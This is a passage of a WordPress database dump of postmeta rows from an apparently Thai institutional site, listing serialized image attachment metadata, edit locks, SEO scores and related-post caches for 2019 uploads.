(13211, 5850, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2019/05/Untitled-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-4-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-4-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-4-1024x438.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:438;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-4-400x171.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13212, 5853, '_wp_attached_file', '2019/05/Untitled-4-1.jpg'),
(13213, 5853, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:400;s:4:\"file\";s:24:\"2019/05/Untitled-4-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-4-1-300x103.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-4-1-768x263.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-4-1-1024x350.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-4-1-400x137.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:137;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13214, 5855, '_edit_lock', '1568450867:14'),
(13215, 5856, '_wp_attached_file', '2019/06/180662-.jpg'),
(13216, 5856, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:19:\"2019/06/180662-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"180662--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"180662--300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"180662--768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"180662--1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"180662--400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13217, 5855, '_edit_last', '14'),
(13218, 5855, '_thumbnail_id', '5856'),
(13222, 5855, '_hide_featured', NULL),
(13223, 5855, '_yoast_wpseo_content_score', '30'),
(13224, 5855, '_yoast_wpseo_primary_category', '31'),
(13225, 5855, '_wpas_done_all', '1'),
(13226, 5855, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575620048;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:4875;}}}}'),
(13227, 5860, '_wp_attached_file', '2019/06/งานศูนย์ข้อมูล.jpg'),
(13228, 5860, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:54:\"2019/06/งานศูนย์ข้อมูล.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"งานศูนย์ข้อมูล-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:54:\"งานศูนย์ข้อมูล-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:54:\"งานศูนย์ข้อมูล-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:55:\"งานศูนย์ข้อมูล-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:54:\"งานศูนย์ข้อมูล-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13229, 5861, '_wp_attached_file', '2019/06/งานศูนย์ข้อมูล-1.jpg'),
(13230, 5861, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1170;s:6:\"height\";i:1115;s:4:\"file\";s:56:\"2019/06/งานศูนย์ข้อมูล-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"งานศูนย์ข้อมูล-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"งานศูนย์ข้อมูล-1-300x286.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:286;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"งานศูนย์ข้อมูล-1-768x732.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"งานศูนย์ข้อมูล-1-1024x976.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:976;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"งานศูนย์ข้อมูล-1-315x300.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13231, 1741, '_thumbnail_id', '5861'),
(13232, 1741, '_yoast_wpseo_content_score', '90'),
(13233, 5865, '_edit_lock', '1568450890:14'),
(13234, 5865, '_edit_last', '14'),
(13235, 5866, '_wp_attached_file', '2019/06/Untitled-6-1.jpg'),
(13236, 5866, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:24:\"2019/06/Untitled-6-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-6-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-6-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-6-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-6-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13237, 5865, '_thumbnail_id', '5866'),
(13241, 5865, '_hide_featured', NULL),
(13242, 5865, '_yoast_wpseo_content_score', '60'),
(13243, 5865, '_yoast_wpseo_primary_category', '31'),
(13244, 5865, '_wpas_done_all', '1'),
(13253, 5865, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575456302;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5179;}i:1;a:1:{s:2:\"id\";i:5855;}i:2;a:1:{s:2:\"id\";i:6057;}}}}'),
(13254, 5868, '_edit_lock', '1568450923:14'),
(13255, 5868, '_edit_last', '14'),
(13256, 5869, '_wp_attached_file', '2019/06/210601ประกาศรับสมัคร-จนท.-พนักงานขับรถ.pdf'),
(13260, 5868, '_hide_featured', NULL),
(13261, 5868, '_yoast_wpseo_content_score', '60'),
(13262, 5868, '_yoast_wpseo_primary_category', '3'),
(13263, 5868, '_wpas_done_all', '1'),
(13266, 5868, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575510369;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(13267, 5871, '_edit_lock', '1568450952:14'),
(13268, 5871, '_edit_last', '14'),
(13269, 5872, '_wp_attached_file', '2019/06/210602ประกาศรับสมัคร-จนท.-พนักงานขับรถ.pdf'),
(13273, 5871, '_hide_featured', NULL),
(13274, 5871, '_yoast_wpseo_content_score', '60'),
(13275, 5871, '_yoast_wpseo_primary_category', ''),
(13276, 5871, '_wpas_done_all', '1'),
(13289, 5875, '_edit_lock', '1568450958:14'),
(13290, 5875, '_edit_last', '14'),
(13294, 5875, '_hide_featured', NULL),
(13295, 5875, '_yoast_wpseo_content_score', '60'),
(13296, 5875, '_yoast_wpseo_primary_category', '3'),
(13297, 5875, '_wpas_done_all', '1'),
(13298, 5875, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575547910;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(13299, 5871, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575504971;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(13301, 5878, '_edit_lock', '1568451283:14'),
(13302, 5878, '_edit_last', '14'),
(13303, 5879, '_wp_attached_file', '2019/06/240662-01.pdf'),
(13307, 5878, '_hide_featured', NULL),
(13308, 5878, '_yoast_wpseo_content_score', '30'),
(13309, 5878, '_yoast_wpseo_primary_category', '3'),
(13310, 5878, '_wpas_done_all', '1'),
(13313, 5878, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575217217;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:5589;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(13316, 5884, '_wp_attached_file', '2019/06/250662-01-.jpg'),
(13317, 5884, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2019/06/250662-01-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"250662-01--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"250662-01--300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"250662-01--768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"250662-01--1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"250662-01--400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13318, 5885, '_wp_attached_file', '2019/06/250662-01-1-1.jpg'),
(13319, 5885, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:25:\"2019/06/250662-01-1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"250662-01-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"250662-01-1-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"250662-01-1-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"250662-01-1-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"250662-01-1-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13320, 5886, '_edit_lock', '1568451313:14'),
(13321, 5886, '_edit_last', '14'),
(13322, 5887, '_wp_attached_file', '2019/06/250662-01-1-2.jpg'),
(13323, 5887, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:25:\"2019/06/250662-01-1-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"250662-01-1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"250662-01-1-2-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"250662-01-1-2-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"250662-01-1-2-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"250662-01-1-2-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13324, 5886, '_thumbnail_id', '5884'),
(13328, 5886, '_hide_featured', NULL),
(13329, 5886, '_yoast_wpseo_content_score', '60'),
(13330, 5886, '_yoast_wpseo_primary_category', '31'),
(13331, 5886, '_wpas_done_all', '1'),
(13334, 5889, '_edit_lock', '1568451340:14'),
(13335, 5889, '_edit_last', '14'),
(13336, 5890, '_wp_attached_file', '2019/06/64974447_840833102959546_2670586389497643008_o.jpg'),
(13337, 5890, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:58:\"2019/06/64974447_840833102959546_2670586389497643008_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"64974447_840833102959546_2670586389497643008_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"64974447_840833102959546_2670586389497643008_o-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"64974447_840833102959546_2670586389497643008_o-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"64974447_840833102959546_2670586389497643008_o-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"64974447_840833102959546_2670586389497643008_o-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13338, 5889, '_thumbnail_id', '5890'),
(13342, 5889, '_hide_featured', NULL),
(13343, 5889, '_yoast_wpseo_content_score', '30'),
(13344, 5889, '_yoast_wpseo_primary_category', '31'),
(13345, 5889, '_wpas_done_all', '1'),
(13346, 5886, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575667252;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:6308;}}}}'),
(13347, 5889, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575642650;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4685;}i:1;a:1:{s:2:\"id\";i:5962;}i:2;a:1:{s:2:\"id\";i:6316;}}}}'),
(13348, 5892, '_edit_lock', '1568451353:14'),
(13349, 5892, '_edit_last', '14'),
(13350, 5893, '_wp_attached_file', '2019/06/ประกาศรายชื่อเจ้าหน้าที่.pdf'),
(13354, 5892, '_hide_featured', NULL),
(13355, 5892, '_yoast_wpseo_content_score', '60'),
(13356, 5892, '_yoast_wpseo_primary_category', '3'),
(13357, 5892, '_wpas_done_all', '1'),
(13360, 5892, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575565508;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(13361, 5897, '_edit_lock', '1568451367:14'),
(13362, 5898, '_wp_attached_file', '2019/06/270662.pdf'),
(13363, 5897, '_edit_last', '14'),
(13367, 5897, '_hide_featured', NULL),
(13368, 5897, '_yoast_wpseo_content_score', '30'),
(13369, 5897, '_yoast_wpseo_primary_category', '3'),
(13370, 5897, '_wpas_done_all', '1'),
(13373, 5900, '_edit_lock', '1568451569:14'),
(13374, 5900, '_edit_last', '14'),
(13375, 5901, '_wp_attached_file', '2019/06/270662-02.jpg'),
(13376, 5901, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/06/270662-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"270662-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"270662-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13377, 5900, '_thumbnail_id', '5901'),
(13381, 5900, '_hide_featured', NULL),
(13382, 5900, '_yoast_wpseo_content_score', '30'),
(13383, 5900, '_yoast_wpseo_primary_category', '31'),
(13384, 5900, '_wpas_done_all', '1'),
(13387, 5903, '_edit_lock', '1568451606:14'),
(13388, 5903, '_edit_last', '14'),
(13389, 5904, '_wp_attached_file', '2019/06/270662-01.jpg'),
(13390, 5904, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/06/270662-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"270662-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"270662-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"270662-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13391, 5903, '_thumbnail_id', '5904'),
(13395, 5903, '_hide_featured', NULL),
(13396, 5903, '_yoast_wpseo_content_score', '30'),
(13397, 5903, '_yoast_wpseo_primary_category', '31'),
(13398, 5903, '_wpas_done_all', '1'),
(13399, 5897, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575126374;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5589;}i:1;a:1:{s:2:\"id\";i:5680;}i:2;a:1:{s:2:\"id\";i:5830;}}}}'),
(13400, 5906, '_edit_lock', '1568451613:14'),
(13401, 5907, '_wp_attached_file', '2019/06/270662-06.jpg'),
